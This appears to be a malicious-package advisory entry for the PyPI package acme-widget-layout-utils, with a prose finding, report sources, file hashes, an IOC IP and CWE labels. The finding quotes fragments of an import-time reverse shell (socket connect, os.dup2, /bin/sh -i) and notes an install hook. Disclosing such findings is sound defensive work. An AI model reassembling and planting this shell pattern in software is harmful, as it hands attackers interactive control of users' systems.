-= Per source details. Do not edit below this line.=-
On import, src/acmewidgetlayout_utils/init.py executes a textbook reverse-shell pattern: it opens a TCP socket, duplicates the socket file descriptor onto stdin/stdout/stderr via os.dup2, and execs /bin/sh -i (lines 11-16: _sock.connect(("127.0.0.1", 1)); os.dup2(_sock.fileno(), 0);...; subprocess.call(["/bin/sh", "-i"])). The hardcoded destination 127.0.0.1:1 is intentionally unreachable in a default environment, but the code is a fully functional reverse shell — any environment that has a listener on that endpoint, that proxies loopback, or that is patched to redirect the connection receives an interactive shell with the importing process's privileges. The package additionally writes a marker file /tmp/pypi_install_hook_marker.txt from a custom setup.py install cmdclass during pip install, and the package is published under a generic widget-layout-utils name despite its pyproject description acknowledging it is a 'pipeline hook probe' with no advertised utility. The name/purpose mismatch increases the risk of accidental installation. Shipping live reverse-shell code on public PyPI under a benign name is unsafe regardless of the author's stated 'security probe' intent.
During import, the package starts a reverse shell.
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-06-acme-widget-layout-utils
Reasons (based on the campaign):
{
"malicious-packages-origins": [
{
"versions": [
"0.0.3"
],
"sha256": "42e53a38c2df70a3c6a2a24b2484840e6a163f2e1a9b91236a2aa7a9ec004600",
"modified_time": "2026-06-11T01:46:15Z",
"source": "amazon-inspector",
"import_time": "2026-06-11T02:24:27.554501614Z",
"id": "IN-MAL-2026-005357"
},
{
"versions": [
"0.0.1",
"0.0.2",
"0.0.3"
],
"sha256": "643a7c935e2bb063cea8baf36f13bca89572d1febbf0efdb05812ee09ddde4d8",
"modified_time": "2026-06-11T05:40:39.931561Z",
"source": "kam193",
"id": "pypi/2026-06-acme-widget-layout-utils/acme-widget-layout-utils",
"import_time": "2026-06-11T07:49:46.172073804Z"
},
{
"versions": [
"0.0.2"
],
"sha256": "ff800752007d4e55ddc8172e04c8d75ac04d61b499cc58d97f016cd34d70d6c4",
"source": "amazon-inspector",
"modified_time": "2026-06-12T19:11:05Z",
"import_time": "2026-06-12T19:44:19.145502925Z",
"id": "IN-MAL-2026-006199"
},
{
"versions": [
"0.0.1",
"0.0.2",
"0.0.3"
],
"sha256": "b88682f3976ea35b55757e68f5e744aab7e1430ad10ec124d24e04c57f16395c",
"modified_time": "2026-06-11T05:40:39.931561Z",
"source": "kam193",
"import_time": "2026-06-13T02:23:25.582806199Z",
"id": "pypi/2026-06-acme-widget-layout-utils/acme-widget-layout-utils"
}
],
"iocs": {
"ips": [
"34.69.137.236"
]
}
}{
"package_integrity": [
{
"filename": "acme_widget_layout_utils-0.0.3-py3-none-any.whl",
"hashes": {
"sha256": "6ac0e78622500c826abe1209dc38b736dc0efdbdf350de726cf61dcb7da7834a",
"md5": "f4295d1297c0cb74a638a3ad949d0817",
"blake2b_256": "38246aec6a745e8f7660a345797c632829f16c2f5b9bf30ea6ba2a19f9b11b53"
}
},
{
"filename": "acme_widget_layout_utils-0.0.3.tar.gz",
"hashes": {
"sha256": "58cea9e8965d0148962288648322bebcd4ddf5576169269981612a9c729bd233",
"md5": "5bd41cffddaf6808608d6875b0a9dc38",
"blake2b_256": "a2a54dc0b1fd6fb75fd5d3f0d66ff1e64cfd2f20f72d07e275683859946b26d8"
}
}
],
"evidence_files": [
{
"sha256": "611dbc535af11a1b91d66630e0f56d6a7a7174e74f46907fb8291d738448738c",
"path": "src/acme_widget_layout_utils/__init__.py",
"tlsh": "c701cb8bcc2ad09a5f72a1918061c068de57a8031b3818b2bdec53146bf302561b4932"
},
{
"sha256": "4ed96d4110ec206f50864acb834b2f11808cb903df3b39a876a3ebcf8fe66eea",
"path": "setup.py",
"tlsh": "7fe02646983f7070ad9383a488b346121c23c6605bf0e2a674fe1a715f931e6cc478c3"
},
{
"sha256": "1ed303a16226ddc822f2fb6d1d148805a1c09eb5577cfaa92220f7588902097f",
"path": "pyproject.toml",
"tlsh": "31e06823cb775965eac164446051a167cdf2e8d92dc0d85c8acfc9983cee0e9c6f8929"
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/acme-widget-layout-utils/MAL-2026-5545.json"
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]